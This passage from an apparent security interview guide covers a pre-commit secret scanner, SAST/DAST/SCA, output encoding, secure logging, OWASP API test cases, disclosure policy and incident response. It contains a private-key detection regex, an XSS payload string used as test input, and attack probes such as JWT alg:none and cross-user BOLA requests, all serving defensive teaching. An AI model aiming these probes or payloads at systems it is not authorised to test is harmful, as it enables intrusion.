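    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}


def scan_text(text):
    """Return (rule, line_number) for each line matching a credential pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((rule, lineno))
    return findings


def scan_staged_changes():
    """Scan only lines added in the staged diff; return 1 (block the commit) on any finding."""
    diff = subprocess.run(["git", "diff", "--cached", "-U0"],
                          capture_output=True, text=True, check=True).stdout
    added = [line[1:] for line in diff.splitlines()
             if line.startswith("+") and not line.startswith("+++")]
    findings = scan_text("\n".join(added))
    for rule, n in findings:
        print(f"possible {rule} in added line {n} of the staged diff")
    return 1 if findings else 0
```

Wired into a hook with `sys.exit(scan_staged_changes())`, a nonzero exit aborts the commit before the secret ever reaches history.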

2What is SAST vs DAST vs SCA? How do they complement each other?

SAST (Static Application Security Testing): Analyzes source code without executing it. Fast, runs in CI, no running application needed. Finds: SQLi patterns, hardcoded secrets, unsafe deserialization, buffer overflows. High false positive rate — needs tuning. Tools: Semgrep, CodeQL, Checkmarx, Veracode, SonarQube.

DAST (Dynamic Application Security Testing): Tests the running application from the outside, simulating an attacker. Finds: auth bypasses, XSS, SQLi that SAST missed, business logic flaws, misconfigurations. Requires a running environment. Tools: OWASP ZAP, Burp Suite, Nuclei.

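SCA (Software Composition Analysis): Analyzes open-source dependencies for known CVEs. Finds: Log4Shell in your dependency tree, outdated packages with patches available. Version-to-advisory matches are usually accurate, but many flagged CVEs are not exploitable in your app because the vulnerable function is never called, so reachability analysis matters for triage. Tools: Snyk, Dependabot, npm audit, OWASP Dependency-Check.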

# They cover different attack surfaces:
# SAST:  your code → finds logic errors and insecure patterns
# DAST:  running app → finds runtime vulnerabilities and misconfigs
# SCA:   your dependencies → finds known CVEs in third-party code

# In practice:
# SAST + secret scanning: every PR in CI (fast feedback; the developer fixes it before merge)
# SCA: every PR + daily scheduled scan (CVEs announced daily)
# DAST: nightly on staging environment (slower, needs running app)
# Manual pentest: quarterly by external firm (context, creativity, chaining vulnerabilities)

# Prioritizing SAST findings:
# Severity: critical/high first
# Reachability: is the vulnerable code path actually reachable?
# Confidence: is this definitely a bug or a false positive?
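At its core, SCA is a version-range lookup over the fully resolved dependency tree against an advisory feed. A simplified sketch with one hardcoded advisory: real tools query databases such as the NVD, OSV, or the GitHub Advisory Database and understand each ecosystem's version syntax (betas, RCs, epochs). `Advisory`, `audit`, and the numeric-only version parsing are hypothetical simplifications.

```python
from dataclasses import dataclass


def parse_version(v: str) -> tuple:
    """'2.14.1' -> (2, 14, 1). Numeric-only; real tools handle betas, RCs, epochs, etc."""
    return tuple(int(part) for part in v.split("."))


@dataclass(frozen=True)
class Advisory:
    package: str
    cve: str
    introduced: str  # first affected version (inclusive)
    fixed: str       # first fixed version (exclusive)


ADVISORIES = [
    # Log4Shell. The real affected range starts at 2.0-beta9; simplified here.
    # 2.15.0 is the first release listed as patched; follow-up CVEs led to later releases.
    Advisory("org.apache.logging.log4j:log4j-core", "CVE-2021-44228", "2.0", "2.15.0"),
]


def audit(resolved_deps: dict) -> list:
    """resolved_deps maps package -> version for the FULL tree, transitive deps included."""
    hits = []
    for adv in ADVISORIES:
        version = resolved_deps.get(adv.package)
        if version is None:
            continue
        if parse_version(adv.introduced) <= parse_version(version) < parse_version(adv.fixed):
            hits.append((adv.package, version, adv.cve))
    return hits
```

Scanning the resolved tree rather than only the direct dependencies is what surfaces Log4Shell when log4j-core arrives transitively through another library.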

3What is input validation and output encoding? Where do these defenses apply?

# Input validation: verify data matches expected format BEFORE processing
# Whitelist approach (preferred): only accept known-good values
# Blacklist approach (weaker): try to block known-bad values (attackers find bypasses)

# Pydantic v2 (hypothetical `db` data-access layer; Decimal avoids float rounding on money)
from decimal import Decimal
from pydantic import BaseModel, Field, field_validator

class PaymentRequest(BaseModel):
    amount: Decimal = Field(gt=0, le=10000, decimal_places=2)  # positive, max $10,000, cents precision
    currency: str = Field(pattern=r'^[A-Z]{3}$')                # exactly 3 uppercase letters
    recipient_id: str = Field(pattern=r'^[0-9]+$')              # ASCII digits only

    @field_validator('recipient_id')
    @classmethod
    def validate_recipient(cls, v):
        if not db.user_exists(int(v)):
            raise ValueError("Invalid recipient")
        return v

# Validate at the earliest entry point, but ALSO validate at each layer:
# API layer: format, type, range
# Business logic: semantic validity (can user send money? sufficient balance?)
# Database: constraints enforce data integrity at the lowest level

# Output encoding: transform data to be safe in its target context
import html
# HTML context: encode HTML special characters
safe_html = html.escape(user_comment)       # < → &lt;, > → &gt;, & → &amp;, " → &quot;, ' → &#x27;

# SQL: never encode — use parameterized queries instead
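# JavaScript: json.dumps() / JSON.stringify(), then escape <, >, & so the data cannot close a <script> tag
# URL: urllib.parse.quote(value, safe="") for a path segment or query value (or urlencode() for a whole query)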
# Shell: use subprocess list syntax, never format into shell strings
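The same untrusted string needs different encoding in each output context. A minimal sketch using only the standard library; the payload, `js_literal`, and `list_dir` are illustrative. `js_literal` is one common approach (JSON-encode, then escape characters that could terminate a `<script>` block), not the only correct one.

```python
import html
import json
import subprocess
from urllib.parse import quote

untrusted = '</script><img src=x onerror=alert(1)>&"'

# HTML body or quoted attribute: escape & < > " '
html_safe = html.escape(untrusted)

# One URL path segment or query value: percent-encode everything, including "/"
url_safe = quote(untrusted, safe="")


def js_literal(value):
    """JSON-encode for an inline <script>, escaping chars that could end the tag."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def list_dir(path):
    # Shell context: pass an argument list (no shell=True), so ; | $() are never interpreted.
    # "--" stops a path like "-rf" from being read as an option.
    return subprocess.run(["ls", "--", path], capture_output=True, text=True).stdout
```

The `\u003c`-style escapes are still valid JSON, so the browser decodes the original string while the HTML parser never sees a literal `</script>`.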

4How do you handle error handling and logging securely? What information should you never expose?

# Never expose to users:
# - Stack traces (reveal technology, file paths, internal structure)
# - Database error messages (they help attackers enumerate the schema and tune SQL injection)
# - Internal IP addresses / hostnames
# - Software versions in error messages
# - Messages that enable user enumeration: say "Invalid credentials", never "This email is not registered"

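# Secure error handling (FastAPI; assumes middleware usually sets request.state.trace_id):
import logging
import uuid
from fastapi import FastAPI, Request
from fastapi.responses import JSONResponse

app = FastAPI()
logger = logging.getLogger(__name__)

@app.exception_handler(Exception)
async def global_exception_handler(request: Request, exc: Exception):
    trace_id = getattr(request.state, "trace_id", None) or str(uuid.uuid4())
    logger.error("Unhandled error", exc_info=exc, extra={"trace_id": trace_id})
    return JSONResponse(
        status_code=500,
        content={"error": "Internal server error", "trace_id": trace_id},
        # trace_id lets support look up the real error in logs;
        # users get a generic error with no internal details
    )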

# What to log (for your systems):
# All authentication events with full context
# All authorization failures (who tried to access what)
# All API errors with input parameters (sanitized)
# Performance metrics and business events

# What NOT to log:
# Passwords (obviously)
# Full credit card numbers, CVV
# SSNs, passport numbers
# OAuth tokens, API keys (if you need to correlate, log only the last 4 chars: sk_...abcd)
# PII that's not needed for debugging

# Log sanitization:
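def sanitize_for_log(data):
    data = dict(data)  # work on a copy; don't mutate the caller's object
    if "password" in data: data["password"] = "[REDACTED]"
    if "cvv" in data: data["cvv"] = "[REDACTED]"
    if "card_number" in data: data["card_number"] = f"****{str(data['card_number'])[-4:]}"
    if "token" in data: data["token"] = f"...{str(data['token'])[-4:]}"
    return data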

5What is security testing for APIs? How do you test for OWASP API Security Top 10?

# OWASP API Security Top 10 (2023) — key tests:

# API1 - Broken Object Level Authorization (BOLA/IDOR):
# Test: create two users A and B, then request A's resources using B's token
# GET /api/orders/12345 (owned by A) with user B's JWT → expect 404 (or 403), never A's order

# API2 - Broken Authentication:
# Test: expired tokens still accepted? Brute force possible?
# Test: JWT with alg:none accepted?

# API3 - Broken Object Property Level Authorization:
# Test: can user update fields they shouldn't (role, is_admin)?
# PUT /api/users/123 {"role": "admin"} → server should ignore role field

# API4 - Unrestricted Resource Consumption:
# Test: no rate limiting → send 10,000 requests per second
# Test: upload huge files → no size limit
# Test: request 1,000,000 records → no pagination limit

# API5 - Broken Function Level Authorization:
# Test: call admin endpoints with regular user token
# GET /api/admin/users → should get 403, not user list

# API8 - Security Misconfiguration:
# Test: default credentials, debug endpoints exposed, CORS *
# Test: HTTP methods not restricted (DELETE on read-only endpoint)

# Automated API testing tools:
# OWASP ZAP API scan: zap-api-scan.py -t openapi.yaml -f openapi
# Burp Suite: active scan against API
# Nuclei: nuclei -t /nuclei-templates/http/ -u https://api.example.com
# Custom scripts: iterate over all resource IDs, test cross-user access
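The "iterate over resource IDs, test cross-user access" idea can be written as a reusable check. A minimal sketch; `bola_findings` is a hypothetical helper, and `client` is anything with a `.get(url, headers=...)` method returning an object with `.status_code`, such as a `requests.Session` (with absolute URLs) or a framework test client.

```python
def bola_findings(client, paths_owned_by_a, token_a, token_b):
    """Request each of user A's resources with user B's token; anything but 403/404 is a finding."""
    findings = []
    for path in paths_owned_by_a:
        own = client.get(path, headers={"Authorization": f"Bearer {token_a}"})
        if own.status_code != 200:
            continue  # owner can't read it either; fix test data before judging access control
        cross = client.get(path, headers={"Authorization": f"Bearer {token_b}"})
        if cross.status_code not in (403, 404):
            findings.append((path, cross.status_code))
    return findings
```

Feeding it every resource path from a seeded test account turns a one-off manual test into a regression check that can run in CI against staging.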

6What is a bug bounty program and responsible disclosure? How should companies handle vulnerability reports?

Responsible disclosure (coordinated disclosure): A security researcher finds a vulnerability, reports it privately to the vendor, and gives them reasonable time (usually 90 days) to fix it before public disclosure. The 90-day standard was popularized by Google Project Zero.

Bug bounty program: Companies invite security researchers to find and report vulnerabilities in exchange for monetary rewards. Platforms: HackerOne, Bugcrowd, Intigriti. Scope defines what's in bounds (which assets, which vulnerability types).

# Security.txt (RFC 9116) — machine-readable vulnerability disclosure policy:
# https://example.com/.well-known/security.txt
Contact: mailto:security@example.com
Contact: https://hackerone.com/example-company
Expires: 2025-12-31T23:59:59Z
Encryption: https://example.com/pgp-key.asc
Policy: https://example.com/security/policy

# Vulnerability response SLAs (reasonable targets):
# Critical (RCE, auth bypass): acknowledge 24h, patch deployed 7 days
# High (IDOR, SQLi, XSS):     acknowledge 48h, patch deployed 30 days
# Medium:                      acknowledge 5 days, patch deployed 90 days
# Low:                         acknowledge 14 days, patch at next release

# Response process:
# 1. Acknowledge receipt (within 24-48h)
# 2. Validate the vulnerability
# 3. Assess severity and business impact
# 4. Develop and test fix
# 5. Deploy fix
# 6. Notify reporter, pay bounty
# 7. Issue CVE if applicable
# 8. Write post-mortem to prevent similar issues
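A stale or malformed security.txt quietly breaks the disclosure channel, so it is worth checking in CI. A minimal sketch covering a subset of RFC 9116 rules (field names are case-insensitive, `Contact` must appear at least once, `Expires` exactly once); `check_security_txt` is a hypothetical helper, not a full parser.

```python
from datetime import datetime, timezone

REQUIRED_FIELDS = ("contact", "expires")


def check_security_txt(text, now=None):
    """Return a list of problems with a security.txt body (subset of RFC 9116 checks)."""
    now = now or datetime.now(timezone.utc)
    fields = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments are allowed
        name, sep, value = line.partition(":")
        if sep:
            # field names are case-insensitive
            fields.setdefault(name.strip().lower(), []).append(value.strip())
    problems = [f"missing required field: {f}" for f in REQUIRED_FIELDS if f not in fields]
    expires = fields.get("expires", [])
    if len(expires) > 1:
        problems.append("Expires must appear only once")
    elif len(expires) == 1:
        when = datetime.fromisoformat(expires[0].replace("Z", "+00:00"))
        if when <= now:
            problems.append("Expires is in the past; the file should be treated as stale")
    return problems
```

Run on a schedule, this catches the common failure where the `Expires` date silently passes and researchers no longer trust the listed contact.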

7What is an incident response plan? What are the phases and key considerations?

An incident response (IR) plan defines the procedures for detecting, containing, and recovering from a security incident. Having a plan before an incident is essential — you can't think clearly when you're under attack.

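NIST SP 800-61 phases (NIST groups Containment, Eradication, and Recovery into one phase; they are listed separately here):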

Preparation: IR plan, playbooks, tools, contact lists, tabletop exercises — before any incident
Detection & Analysis: Identify the incident, scope it, determine severity. Preserve evidence (logs, memory dumps) before containment
Containment: Stop the bleeding without destroying evidence. Short-term (isolate affected systems) and long-term (patch/harden)
Eradication: Remove the threat actor — malware, backdoors, compromised credentials
Recovery: Restore systems from clean backups, verify no persistence remains, gradually restore service
Post-Incident Activity: Root cause analysis, lessons learned, update defenses, update IR plan

# Key decisions during an incident:
# 1. Notify or contain first?
#    Preserve evidence, notify legal/privacy team early (breach notification laws)
#    GDPR: notify supervisory authority within 72 hours of becoming aware

# 2. Communicate externally?
#    Legal and PR involved early — don't say anything publicly that could be wrong
#    Breach notification required: GDPR, CCPA, HIPAA, state laws

# 3. Forensic preservation:
#    Don't wipe/reimage before collecting forensic image
#    Memory dump before reboot (volatile evidence)
#    Network capture, log preservation

# Credential compromise response checklist:
# □ Revoke all tokens/sessions for affected accounts
# □ Reset passwords + force MFA re-enrollment
# □ Rotate all secrets that may have been exposed
# □ Audit access logs for what data was accessed
# □ Notify affected users per applicable laws